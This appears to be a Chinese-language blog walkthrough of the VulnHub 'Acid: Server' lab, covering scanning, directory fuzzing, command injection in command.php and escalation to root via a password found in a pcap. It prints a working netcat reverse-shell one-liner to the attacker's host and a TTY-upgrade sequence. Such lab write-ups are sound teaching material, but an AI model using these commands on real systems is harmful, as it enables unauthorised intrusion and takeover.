526互联

VulnHub-Acid: Server

发布时间 2023-04-18 17:13:11作者: HKalpa

靶机地址:https://www.vulnhub.com/entry/acid-server,125/

目标:Escalate the privileges to root and capture the flag.

人话:将权限提升为 root 并捕获标志。

一、信息收集

1、靶机发现

nmap -sn 192.168.11.0/24

-sn:Ping扫描-禁用端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.11.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 20:04 CST
Nmap scan report for 192.168.11.1
Host is up (0.00026s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.11.136
Host is up (0.0010s latency).
MAC Address: 00:0C:29:6D:91:7D (VMware)
Nmap scan report for 192.168.11.254
Host is up (0.00065s latency).
MAC Address: 00:50:56:FA:34:33 (VMware)
Nmap scan report for 192.168.11.131
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 27.93 seconds

2、端口扫描

nmap -sV -T4 -A -p- 192.168.11.136

-sV:探测打开的端口以确定服务/版本信息

-T<0-5>:设置计时模板(越高越快)

-A:启用操作系统检测、版本检测、脚本扫描和traceroute

-p <port ranges>:仅扫描指定的端口

┌──(root㉿kali)-[~]
└─# nmap -sV -T4 -A -p- 192.168.11.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 20:06 CST
Nmap scan report for 192.168.11.136
Host is up (0.0016s latency).
Not shown: 65534 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
|_http-title: /Challenge
|_http-server-header: Apache/2.4.10 (Ubuntu)
MAC Address: 00:0C:29:6D:91:7D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.56 ms 192.168.11.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.84 seconds

33447端口

提供Web服务,访问http://192.168.11.136:33447/查看网站模板Apache版本信息等搜索相关CVE漏洞无果

whatweb http://192.168.11.136:33447/

┌──(root㉿kali)-[~]
└─# whatweb http://192.168.11.136:33447/
http://192.168.11.136:33447/ [200 OK] Apache[2.4.10], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.10 (Ubuntu)], IP[192.168.11.136], Title[/Challenge]

没有什么有价值的东西,查看源码发现标题类似目录

注:

  • 源码最后一行有一个字符串:0x643239334c6d70775a773d3d

  • 十六进制解码发现文件名:wow.gif

  • 下载文件(wow.gif)后以文本打开最后一行:

    37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34

  • 使用ASCII转码:7aee0f6d588ed9905ee37f16a7c610d4

  • 使用MD5解码:63425

    解密网站:MD5在线免费破解

  • 联想到之前index.html所说的使用钥匙打开魔法门,那么这串数字字符串应该就是打开门的关键了(结果卵用没有)

访问http://192.168.11.136:33447/Challenge/发现登录页面(尝试利用)

用dirsearch扫描目录,也没有扫出啥有用的

dirsearch -u http://192.168.11.136:33447/

-u URL, --url=URL:目标网址

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.11.136:33447/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.11.136-33447/-_23-04-17_10-21-10.txt

Error Log: /root/.dirsearch/logs/errors-23-04-17_10-21-10.log

Target: http://192.168.11.136:33447/

[10:21:10] Starting: 
[10:21:13] 403 -  303B  - /.ht_wsr.txt                                     
[10:21:13] 403 -  306B  - /.htaccess.save                                  
[10:21:13] 403 -  306B  - /.htaccess.bak1
[10:21:13] 403 -  304B  - /.htaccess_sc
[10:21:13] 403 -  304B  - /.htaccessOLD
[10:21:13] 403 -  304B  - /.htaccessBAK
[10:21:13] 403 -  306B  - /.htaccess.orig
[10:21:13] 403 -  307B  - /.htaccess_extra
[10:21:13] 403 -  306B  - /.htaccess_orig
[10:21:13] 403 -  297B  - /.html                                           
[10:21:13] 403 -  296B  - /.htm
[10:21:14] 403 -  306B  - /.htpasswd_test
[10:21:14] 403 -  302B  - /.htpasswds
[10:21:14] 403 -  305B  - /.htaccessOLD2
[10:21:14] 403 -  303B  - /.httr-oauth                                     
[10:21:14] 403 -  296B  - /.php                                            
[10:21:14] 403 -  297B  - /.php3                                           
[10:21:16] 403 -  308B  - /.htaccess.sample                                 
[10:21:23] 301 -  323B  - /css  ->  http://192.168.11.136:33447/css/        
[10:21:26] 301 -  326B  - /images  ->  http://192.168.11.136:33447/images/  
[10:21:26] 403 -  299B  - /images/
[10:21:26] 200 -  899B  - /index.html                                       
[10:21:32] 403 -  306B  - /server-status/                                   
[10:21:32] 403 -  305B  - /server-status                                    

Task Completed

二、反弹SHELL

1、漏洞发现

http://192.168.11.136:33447/Challenge/页面进行测试,尝试注入等均无果,用wfuzz进行网站目录扫描。

wfuzz --hc 404 -w /usr/share/dirb/wordlists/big.txt http://192.168.11.136:33447/Challenge/FUZZ.php

--hc/hl/hw/hh N[,N]+:隐藏具有指定代码/行/词/字符的响应(使用BBB从基线获取值)

-w wordlist:指定单词列表文件(-z文件的别名,单词列表)

![IMG_20230417110929](C:\Users\Kalpa\Desktop\Files\博客篇\打靶篇\VulnHub-Acid Server\images\IMG_20230417110929.png)┌──(root㉿kali)-[~/下载]
└─# wfuzz --hc 404 -w /usr/share/dirb/wordlists/big.txt http://192.168.11.136:33447/Challenge/FUZZ.php
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.11.136:33447/Challenge/FUZZ.php
Total requests: 20469

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000015:   403        11 L     32 W       315 Ch      ".htaccess"
000000016:   403        11 L     32 W       315 Ch      ".htpasswd"
000003963:   200        17 L     33 W       496 Ch      "cake"
000007060:   200        12 L     27 W       309 Ch      "error"
000009563:   200        40 L     80 W       1333 Ch     "index"
000009548:   302        0 L      0 W        0 Ch        "include"

Total time: 10.58594
Processed Requests: 20469
Filtered Requests: 20463
Requests/sec.: 1933.600

http://192.168.11.136:33447/Challenge/cake.php发现页面标题也类似目录

继续跑wfuzz呗

wfuzz -c --hc 404 -w /usr/share/dirb/wordlists/big.txt http://192.168.11.136:33447/Challenge/Magic_Box/FUZZ.php

-c:使用颜色输出

┌──(root㉿kali)-[~/下载]
└─# wfuzz -c --hc 404 -w /usr/share/dirb/wordlists/big.txt http://192.168.11.136:33447/Challenge/Magic_Box/FUZZ.php
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.11.136:33447/Challenge/Magic_Box/FUZZ.php
Total requests: 20469

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000016:   403        11 L     32 W       325 Ch      ".htpasswd"
000000015:   403        11 L     32 W       325 Ch      ".htaccess"
000004958:   200        17 L     54 W       594 Ch      "command"
000011134:   200        0 L      0 W        0 Ch        "low"

Total time: 0
Processed Requests: 20469
Filtered Requests: 20465
Requests/sec.: 0

最终发现http://192.168.11.136:33447/Challenge//Magic_Box/command.php页面存在命令注入

2、漏洞利用

利用NC反弹SHELL

  • Kali端监听

    nc -lvnp 8989

    ┌──(root㉿kali)-[~]
    └─# nc -lvnp 5868
    listening on [any] 5868 ...

  • 靶机反弹SHELL

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.131 5868 >/tmp/f

3、升级Full TTY

python -c 'import pty; pty.spawn("/bin/bash")'

CTRL+Z

stty raw -echo

fg

ls

export SHELL=/bin/bash

export TERM=screen

stty rows 33 columns 145

reset

┌──(root㉿kali)-[~]
└─# nc -lvnp 5868
listening on [any] 5868 ...
connect to [192.168.11.131] from (UNKNOWN) [192.168.11.136] 56586
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@acid:/var/www/html/Challenge/Magic_Box$ ^Z
[1]+  已停止               nc -lvnp 5868

┌──(root㉿kali)-[~]
└─# stty raw -echo

┌──(root㉿kali)-[~]
└─#
nc -lvnp 5868
             ls
command.php       command2.php.save    low.php  tails.php
command.php.save  command2.php.save.1  proc
www-data@acid:/var/www/html/Challenge/Magic_Box$ export SHELL=/bin/bash
www-data@acid:/var/www/html/Challenge/Magic_Box$ export TERM=screen
www-data@acid:/var/www/html/Challenge/Magic_Box$ stty rows 33 columns 145
www-data@acid:/var/www/html/Challenge/Magic_Box$ reset

三、权限提升

/etc/passwd中查看到三个有用的用户,分别是:root、acid、saman

root:x:0:0:root:/root:/bin/bash
acid:x:1000:1000:acid,,,:/home/acid:/bin/bash
saman:x:1001:1001:,,,:/home/saman:/bin/bash

分别查看acid和saman用户所拥有的文件

find / -user [user] 2>/dev/null

  • 2:标准错误

  • /dev/null:空设备

  • 2>/dev/null:将标准错误输入到空设备

在acid用户所有的文件下发现一个流量包,它的名字说这是个提示(上面的魔法之门钥匙也是这么说的),尝试一下吧

www-data@acid:/var/www/html/Challenge/Magic_Box$ find / -user acid 2>/dev/null
/sbin/raw_vs_isi/hint.pcapng
......

靶机启动httpd服务

python3 -m http.server

www-data@acid:/sbin/raw_vs_isi$ cd /sbin/raw_vs_isi/
www-data@acid:/sbin/raw_vs_isi$ ls -al
total 816
drwxr-xr-x 2 root root   4096 Aug  7  2015 .
drwxr-xr-x 3 root root  12288 Aug  8  2015 ..
-rwxr--r-- 1 acid acid 818744 Aug  7  2015 hint.pcapng
www-data@acid:/sbin/raw_vs_isi$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 ...

Kali接收流量包

wget http://192.168.11.136:8000/hint.pcapng

┌──(root㉿kali)-[~]
└─# wget http://192.168.11.136:8000/hint.pcapng
--2023-04-17 15:11:31--  http://192.168.11.136:8000/hint.pcapng
正在连接 192.168.11.136:8000... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:818744 (800K) [application/octet-stream]
正在保存至: “hint.pcapng”

hint.pcapng                          100%[===================================================================>] 799.55K  --.-KB/s  用时 0.03s   

2023-04-17 15:11:31 (30.4 MB/s) - 已保存 “hint.pcapng” [818744/818744])

显示过滤器中输入表达式tcp.stream eq 0筛选出第一个TCP流(包含完整的一次TCP连接:三次握手和四次挥手)

在TCP流中发现saman用户及其密码

  • 用户名:saman

  • 密码:1337hax0r

切换到saman后直接sudo -i到root,获取到root权限。

www-data@acid:/sbin/raw_vs_isi$ su saman 
Password: 
saman@acid:/sbin/raw_vs_isi$ sudo -i
[sudo] password for saman: 
  ____                            _         _       _   _                 
 / ___|___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  ___ 
| |   / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
 \____\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
                  |___/                                                   
root@acid:~# id
uid=0(root) gid=0(root) groups=0(root)

在root根目录找到flag

root@acid:~# ls -al
total 68
drwx------  4 root root  4096 Aug  8  2015 .
drwxr-xr-x 23 root root  4096 Aug  8  2015 ..
-rw-------  1 root root 24584 Aug  8  2015 .bash_history
-rw-r--r--  1 root root  3135 Aug  8  2015 .bashrc
drwx------  3 root root  4096 Aug  6  2015 .config
drwx------  3 root root  4096 Aug  6  2015 .dbus
-rw-r--r--  1 root root   192 Aug  8  2015 flag.txt
-rw-------  1 root root  2027 Aug  7  2015 .mysql_history
-rw-------  1 root root    84 Aug  8  2015 .nano_history
-rw-r--r--  1 root root   140 Feb 20  2014 .profile
-rw-r--r--  1 root root    66 Aug  6  2015 .selected_editor
root@acid:~# cat flag.txt


Dear Hax0r,


You have successfully completed the challenge.

I  hope you like it.


FLAG NAME: "Acid@Makke@Hax0r"


Kind & Best Regards

-ACID
facebook: https://facebook.com/m.avinash143


root@acid:~#

注:另类提权

http://192.168.11.136:33447/Challenge/Magic_Box/command.php页面发现的1337 Hax0r去空格后小写即为saman密码。

所以在得到SHELL后直接尝试信息收集的用户名(root、acid、saman)密码(1337Hax0r、1337hax0r)一路提权到root。

至此打靶结束OvO